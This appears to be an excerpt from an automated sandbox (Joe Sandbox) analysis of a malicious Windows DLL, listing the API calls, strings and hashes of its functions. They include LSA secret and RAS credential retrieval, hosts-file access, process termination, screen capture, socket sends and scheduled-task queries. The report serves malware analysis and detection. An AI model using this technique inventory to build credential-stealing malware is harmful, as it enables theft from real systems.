                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #860$#2614Path$#800#858Args$#6143#6874#6876#825#941RemoveSpacesUnquote_splitpath
                                                  • String ID:
                                                  • API String ID: 2691293456-0
                                                  • Opcode ID: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                  • Instruction ID: c1f90ecbaa6655960492b8b6f0b929a9783f598dd6715e5503ef59e830b1600e
                                                  • Opcode Fuzzy Hash: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                  • Instruction Fuzzy Hash: 9451C3792043459BC728CF64D951FEEB7E9EF88710F40461CF55A872C1DB70A609CB96
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000590A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                  • LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                  • LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                  • free.MSVCRT ref: 10005993
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$free
                                                  • String ID: .23$2$3$D$I$L$_RasDefaultCredentials#0$LsaClose$LsaOpenPolicy$LsaRetrievePrivateData$P$V
                                                  • API String ID: 1540231353-1695543321
                                                  • Opcode ID: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                  • Instruction ID: b87623f99a44c4d79927182bb7b3290fde75b39c0de0aa94dcbdadddc74f4482
                                                  • Opcode Fuzzy Hash: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                  • Instruction Fuzzy Hash: 1A3192B610C3859ED300DB68DC84AABBBD8EBD4254F44491EF988D7241E675DA0DCBA3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteFreeLocalOpenwsprintf
                                                  • String ID: D$N$U$a$a$i$m$m$o$o$r$t$u
                                                  • API String ID: 321629408-3882932831
                                                  • Opcode ID: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                  • Instruction ID: 9e633f2ff59cbc2020f784f894622fe3b489b46e50fdb71083fa3736798a3e6b
                                                  • Opcode Fuzzy Hash: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                  • Instruction Fuzzy Hash: 4941256610E3C1DED302CB689484A8BBFD56BB6608F48499DF4C857342C6A9C61CC7BB
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Value$AddressDeleteLibraryLoadProc
                                                  • String ID: A$ADVAPI32.dll$E$ExA$K$RegCrkat$RegOpenKeyExA$x$y
                                                  • API String ID: 839562100-350676929
                                                  • Opcode ID: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                  • Instruction ID: 1ed5652b7448f0d279fc009ec0fc7650b7380c8c77e483b0f181bc9d886ff7ae
                                                  • Opcode Fuzzy Hash: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                  • Instruction Fuzzy Hash: 60516F71A04289AEDB00DBA8CC84FEF7BB8EB99754F054109F604AB291DB74E940CB60
                                                  APIs
                                                  • #540.MFC42 ref: 1000A14F
                                                  • #540.MFC42 ref: 1000A163
                                                  • #860.MFC42(00000000), ref: 1000A1B1
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011005
                                                    • Part of subcall function 10010FD0: #825.MFC42(?), ref: 10011044
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 1001105A
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011067
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011074
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011081
                                                    • Part of subcall function 10010FD0: #801.MFC42 ref: 1001108E
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 1001109B
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 100110A8
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 100110B8
                                                  • lstrcpyA.KERNEL32(?,?,00000000), ref: 1000A1DA
                                                  • CreateFileA.KERNEL32(?,00000008,00000001,00000000,00000003,00000000,00000000), ref: 1000A1ED
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 1000A1FD
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000A20B
                                                  • PathFindFileNameA.SHLWAPI(?), ref: 1000A216
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1000A225
                                                  • GetFileAttributesExA.KERNEL32(?,00000000,?), ref: 1000A233
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 1000A243
                                                  • wsprintfA.USER32 ref: 1000A276
                                                  • #823.MFC42(0000022E), ref: 1000A281
                                                  • Sleep.KERNEL32(0000000A), ref: 1000A2B1
                                                  • #800.MFC42 ref: 1000A2C5
                                                  • #800.MFC42 ref: 1000A2D9
                                                    • Part of subcall function 10011EC0: #858.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011EF8
                                                    • Part of subcall function 10011EC0: #800.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011F09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$File$#540Timelstrcpy$#801#823#825#858#860AttributesCloseCreateFindHandleNamePathSizeSleepSystemwsprintf
                                                  • String ID: %d-%d-%d
                                                  • API String ID: 4162832437-1067691376
                                                  • Opcode ID: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                  • Instruction ID: e65afb7b552d62d436e06514f25d1dc28ad07c56c8aeeae503be500a7d4ecf2d
                                                  • Opcode Fuzzy Hash: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                  • Instruction Fuzzy Hash: 67419079148382ABE324DB64CC49FAFB7A8FF85700F044A2CF599972D1CB74A544CB62
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,ReadFile), ref: 10021ECA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021ED3
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,LocalAlloc), ref: 10021EE3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021EE6
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,LocalFree), ref: 10021EF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021EF9
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,Sleep), ref: 10021F09
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021F0C
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,PeekNamedPipe), ref: 10021F1C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021F1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: KERNEL32.dll$LocalAlloc$LocalFree$PeekNamedPipe$ReadFile$Sleep$kernel32.dll
                                                  • API String ID: 2574300362-1218197485
                                                  • Opcode ID: db3c6ffe9c2453a1131e68fd2b8d6cef7e6288d4bf9072ecd034f117ac42ecc1
                                                  • Instruction ID: dd281816244d95a183e11c8b804c49a018b3967d0145ae836d24216adbf5599a
                                                  • Opcode Fuzzy Hash: db3c6ffe9c2453a1131e68fd2b8d6cef7e6288d4bf9072ecd034f117ac42ecc1
                                                  • Instruction Fuzzy Hash: 3C310BB1614349ABD714EFB1CD49F9B7AE8EFC8744F40092DB684AB140DB74E904CBA6
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32 ref: 1001A292
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001A299
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: G$I$N$S$a$f$i$kernel32.dll$m$n$o$s$v$y
                                                  • API String ID: 1646373207-3978980583
                                                  • Opcode ID: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                  • Instruction ID: bfef907bca7166945bb8c4c048d14843ea41578d74aef9e94cfa9c66aad3b8c8
                                                  • Opcode Fuzzy Hash: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                  • Instruction Fuzzy Hash: 18111C1050C3C28EE302DB6C844838FBFD55BA2644F48888DF4D84A293D2BAC69CC7B7
                                                  APIs
                                                  • LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                    • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                    • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                    • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                  • GetDesktopWindow.USER32 ref: 10018B62
                                                  • GetDC.USER32(00000000), ref: 10018B6F
                                                  • GetTickCount.KERNEL32 ref: 10018B83
                                                  • GetSystemMetrics.USER32(00000000), ref: 10018BAD
                                                  • GetSystemMetrics.USER32(00000001), ref: 10018BB4
                                                  • CreateCompatibleDC.GDI32(?), ref: 10018BD2
                                                  • CreateCompatibleDC.GDI32(?), ref: 10018BDB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 10018BE4
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 10018BEA
                                                  • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10018C49
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 10018C5A
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 10018C6E
                                                  • SelectObject.GDI32(?,?), ref: 10018C84
                                                  • SelectObject.GDI32(?,?), ref: 10018C8E
                                                  • SelectObject.GDI32(?,?), ref: 10018C9E
                                                  • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 10018CAE
                                                  • #823.MFC42(00000002), ref: 10018CBD
                                                  Similarity
                                                  • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$#823CountCursorLoadRectReleaseTick
                                                  • String ID:
                                                  • API String ID: 704209761-0
                                                  • Opcode ID: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                  • Instruction ID: b86d6b879deca8f43264229754a3adc1f6ec2cd8ec19f7890218ae82cecf81d1
                                                  • Opcode Fuzzy Hash: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                  • Instruction Fuzzy Hash: 2E81F3B4504B459FD320DF69C884A67FBE9FB88704F004A1DE59A87750DBB9F805CBA1
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                  • Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                  • #4202.MFC42(00000000), ref: 1000BC03
                                                  • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                  • #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                  • #4202.MFC42 ref: 1000BC35
                                                  • #5572.MFC42(000000FF), ref: 1000BC78
                                                  • #800.MFC42(000000FF), ref: 1000BC88
                                                  • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                  • #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                  • #800.MFC42 ref: 1000BCC0
                                                  • OpenProcess.KERNEL32(00000001,00000000,00000128), ref: 1000BCE7
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000BCF1
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000BCF8
                                                  • #5572.MFC42(000000FF), ref: 1000BD04
                                                  • #5572.MFC42(000000FF,000000FF), ref: 1000BD12
                                                  • #800.MFC42(000000FF,000000FF), ref: 1000BD22
                                                  • #800.MFC42(000000FF,000000FF), ref: 1000BD39
                                                  Similarity
                                                  • API ID: #5572#800$Process32$#4202NextProcess$#537CloseCreateFirstHandleOpenSnapshotTerminateToolhelp32
                                                  • String ID:
                                                  • API String ID: 1944864456-0
                                                  • Opcode ID: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                  • Instruction ID: ee7fe5d149508e1b0384bfe3d7b9a40c8a8a5284b934431346b927ad99a76550
                                                  • Opcode Fuzzy Hash: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                  • Instruction Fuzzy Hash: 18417F350083859FE360DF64C891EEFB7D9EF953A0F944B2DF4A9421E1EB34A908C652
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                  • strrchr.MSVCRT ref: 1001D8C3
                                                  • strrchr.MSVCRT ref: 1001D904
                                                  • isdigit.MSVCRT ref: 1001D93C
                                                  • memmove.MSVCRT(?,?), ref: 1001D95D
                                                  • atoi.MSVCRT(?), ref: 1001D995
                                                  • sprintf.MSVCRT ref: 1001D9B9
                                                    • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                  • sprintf.MSVCRT ref: 1001D9E3
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 1001DA13
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001DA23
                                                  • printf.MSVCRT ref: 1001DA36
                                                  • printf.MSVCRT ref: 1001DA50
                                                  Similarity
                                                  • API ID: File$printfsprintfstrrchr$AttributesCloseCreateHandleModuleNameatoiisdigitmemmove
                                                  • String ID: At least one INI file in range 1 to 30 already exists.$C:\ProgramData\%d.ini$INI file path: %s
                                                  • API String ID: 584443958-3437802155
                                                  • Opcode ID: 17627fb30408fd57ff619499f816264e09329c46bd1b649663920d6fbcb07ba9
                                                  • Instruction ID: c0c76446fe8cf5dfd53c2ad47e4552eba09380e3d432d267a36c7f42f3247707
                                                  • Opcode Fuzzy Hash: 17627fb30408fd57ff619499f816264e09329c46bd1b649663920d6fbcb07ba9
                                                  • Instruction Fuzzy Hash: 614146761043141BE324E7789C85BEB37D8FB84324F040E2DFA59971D0EBB5E68883A2
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 10029574
                                                  • GetCurrentProcess.KERNEL32(?), ref: 1002957F
                                                  • IsWow64Process.KERNEL32(00000000), ref: 10029586
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100295D1
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 100295EB
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 100295FB
                                                  • LocalAlloc.KERNEL32(00000040,00000002), ref: 10029609
                                                  • ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 1002961E
                                                  • LocalFree.KERNEL32(00000000), ref: 10029629
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029630
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029641
                                                  • LocalSize.KERNEL32(00000000), ref: 1002964B
                                                  • LocalFree.KERNEL32(00000000), ref: 1002965D
                                                  Strings
                                                  • \sysnative\drivers\etc\hosts, xrefs: 10029596
                                                  • \system32\drivers\etc\hosts, xrefs: 1002959D
                                                  Similarity
                                                  • API ID: FileLocal$CloseFreeHandleProcessSize$AllocAttributesCreateCurrentDirectoryReadWindowsWow64
                                                  • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                  • API String ID: 2528494210-1011561390
                                                  • Opcode ID: 054d26be596b902fa95bae9bce00a87ca9b2867d96e29c3ff1e8a0496d31c0d7
                                                  • Instruction ID: d5adc3ae6ecb6841eeb3fa0ff141ec478325443b7579d493578cb5101da691f6
                                                  • Opcode Fuzzy Hash: 054d26be596b902fa95bae9bce00a87ca9b2867d96e29c3ff1e8a0496d31c0d7
                                                  • Instruction Fuzzy Hash: 7331E4352002106FE3159F78DC89FEB77A8FB88320F144B29FA5A922D0DAB499098765
                                                  APIs
                                                  • CreatePipe.KERNEL32 ref: 10020A72
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?), ref: 10020AED
                                                  • CloseHandle.KERNEL32(?), ref: 10020AFA
                                                  Similarity
                                                  • API ID: Create$CloseHandlePipeProcess
                                                  • String ID: D$schtasks /Query /TN MM
                                                  • API String ID: 1262542551-2635328053
                                                  • Opcode ID: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                  • Instruction ID: 0981537ea3ed7163310ddf7b13f575be98c0f6f7661eef0bbbfb29fdb67919c4
                                                  • Opcode Fuzzy Hash: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                  • Instruction Fuzzy Hash: A851DF75604351AFD721CF28C884AEFBBE6FB88744F944A1EF98987240D77599048B92
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012641
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012651
                                                  • wsprintfA.USER32 ref: 10012683
                                                  • CloseHandle.KERNEL32(00000000), ref: 100126D7
                                                  • Sleep.KERNEL32(00000002), ref: 100126F1
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012730
                                                  • GetProcAddress.KERNEL32(00000000,send), ref: 1001273C
                                                  • FreeLibrary.KERNEL32(?), ref: 10012794
                                                  Similarity
                                                  • API ID: Library$AddressLoadProc$CloseFreeHandleSleepwsprintf
                                                  • String ID: ID= %d $closesocket$send$ws2_32.dll$Wu
                                                  • API String ID: 1680113600-3344951271
                                                  • Opcode ID: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                  • Instruction ID: c6c0da67d46d13d68f268ba758adfad6d1a8e6a04e0d0a6cfae2b139a2cc5429
                                                  • Opcode Fuzzy Hash: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                  • Instruction Fuzzy Hash: 5941B3B9608355AFD714DF78CC88B9BB7E4FB88344F040A18F985DB281D774E9608B61
                                                  Similarity
                                                  • API ID: getenv
                                                  • String ID: JSIMD_FORCE3DNOW$JSIMD_FORCEAVX2$JSIMD_FORCEMMX$JSIMD_FORCENONE$JSIMD_FORCESSE$JSIMD_FORCESSE2$JSIMD_NOHUFFENC
                                                  • API String ID: 498649692-40509672
                                                  • Opcode ID: 61b2c6428c2de1600953aa50287c5fc1a017f9c2394c6be7f3d5de403615fe6d
                                                  • Instruction ID: 1292ee3b40c95aece04a650f8e7d07c75e6783a970d692f9490819dafc268f4a
                                                  • Opcode Fuzzy Hash: 61b2c6428c2de1600953aa50287c5fc1a017f9c2394c6be7f3d5de403615fe6d
                                                  • Instruction Fuzzy Hash: 0F2129EBA201152FF751E2317D4A76531C1F7A13E2F9A8231E805DF2C6FA18DD469392
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 10005AA7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32 ref: 10005386
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                  • wsprintfA.USER32 ref: 10005B17
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32 ref: 1000590A
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                    • Part of subcall function 10005B80: LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                    • Part of subcall function 10005B80: GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
